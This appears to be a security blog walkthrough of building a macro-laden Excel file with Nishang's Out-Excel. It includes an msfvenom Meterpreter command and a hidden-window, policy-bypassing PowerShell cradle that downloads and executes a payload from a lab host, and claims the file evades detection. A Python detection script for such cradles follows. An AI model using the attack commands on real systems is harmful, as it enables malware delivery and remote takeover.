Nishang – Out-Excel

Nishang has a set of client-side attack scripts designed to weaponize Office documents. Here is a quick demo using Nishang's PowerShell cmdlet Out-Excel to generate an Excel file that contains code to download and execute a Meterpreter payload. I'm using Kali to generate and serve the payload, and my Windows machine will play the role of both attacker and victim for ease of demo.

  1. On Kali, generate the Meterpreter payload, start a web server, and copy the payload to the web root:

     msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.201 -f psh-reflection > ps_payload32.ps1


  2. On Kali, start a listener:

[Screenshot: out-excel_handler]

  3. On your Windows (attacker) machine, import the Nishang module and use the Out-Excel cmdlet to create a weaponized Excel spreadsheet. If you don't have Nishang, you can get it here: https://github.com/samratashok/nishang.

[Screenshot: out-excel_import-module]

Disregard the error message when importing. The Out-Excel cmdlet generates an Excel file (Salary_Details.xls) and inserts VB script that connects to the server hosting the payload, as specified in the PayloadURL parameter.

[Screenshot: out-excel_files]

Now I'll play the part of the victim and double-click the Salary_Details.xls spreadsheet. The VB code in the spreadsheet starts PowerShell, downloads the payload, and executes it. And then I get my Meterpreter session:

[Screenshot: out-excel_meterpreter]

As of now, nothing gets detected as malware. The payload runs in memory and the Excel file itself is benign. The code the Excel file carries is just this one-line command:

    powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.201/ps_payload32.ps1'));

As you can see, it invokes PowerShell with options that hide the window and bypass the execution policy, then passes a command that downloads the payload from the server. IEX is an alias for the Invoke-Expression cmdlet, which executes the downloaded string, in this case the PowerShell Meterpreter payload.
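From the defender's side, that command line is exactly what process-creation telemetry (Sysmon Event ID 1, or Windows Security event 4688 with command-line logging enabled) records when the macro fires: an Office process spawning powershell.exe with a hidden window, an execution-policy bypass and a DownloadString/IEX download cradle. The Python script below is an added example, not code from this post or from Nishang. It scores constructed sample records on those indicators, decodes a -EncodedCommand argument before matching (assuming the UTF-16LE encoding powershell.exe expects), and flags Office parents; the field names, indicator weights and alert threshold are my own assumptions, and the sample records are constructed, not real telemetry.

```python
import base64
import re
from typing import Dict, List

# Office host processes that should rarely spawn a shell directly.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# (name, weight, pattern) scanned over the raw command line plus any decoded
# -EncodedCommand payload. Names and weights are assumptions for this example.
INDICATORS = [
    ("download_cradle", 3, re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I)),
    ("invoke_expression", 3, re.compile(r"\biex\b|invoke-expression", re.I)),
    # -w hidden, -win hidden, -WindowStyle hidden (powershell.exe accepts parameter prefixes)
    ("hidden_window", 2, re.compile(r"-w\w*\s+hidden", re.I)),
    # -ep bypass, -exec bypass, -ExecutionPolicy Bypass
    ("policy_bypass", 2, re.compile(r"-e(?:p|x\w*)\s+bypass", re.I)),
    ("no_profile", 1, re.compile(r"-nop\w*", re.I)),
]
# -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"-e(?:c|nc\w*)\s+([A-Za-z0-9+/=]{16,})", re.I)


def _encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample process-creation records (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the cradle from the post, as launched by the macro in Salary_Details.xls
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo "
                       "-noprofile -c IEX ((New-Object Net.WebClient)"
                       ".DownloadString('http://192.168.0.201/ps_payload32.ps1'));",
    },
    {   # benign admin script started from the desktop
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    },
    {   # the same cradle logged behind cmd.exe and an encoded command
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c powershell -w hidden -ep bypass -enc " + _encode_command(
            "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.201/ps_payload32.ps1')"),
    },
]


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script, or "" if none is present or it is invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation record; a higher score means more cradle-like."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + decoded        # match on the raw line and on the decoded payload
    hits = [name for name, _, rx in INDICATORS if rx.search(text)]
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    if parent in OFFICE_PARENTS:           # an Office app spawning a shell is the strongest signal
        hits.insert(0, "office_parent")
        score += 4
    if decoded:                            # an encoded command is itself worth noting
        hits.append("encoded_command")
        score += 2
    return {"score": score, "indicators": hits, "decoded_command": decoded}


def triage(events: List[Dict[str, str]], threshold: int = 8) -> List[Dict[str, object]]:
    """Return the records whose score meets the alert threshold."""
    alerts = []
    for ev in events:
        result = analyze_event(ev)
        if result["score"] >= threshold:
            result["image"] = ev.get("Image", "")
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["score"], alert["image"], alert["indicators"])
```

The point of scoring rather than matching a single string is that the cradle survives trivial rewording (abbreviated switches, a cmd.exe hop, an encoded command) while the combination of Office parent, hidden window, policy bypass and a download-plus-IEX pair is rare in legitimate administration; the benign backup script scores 1 and never reaches the threshold.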

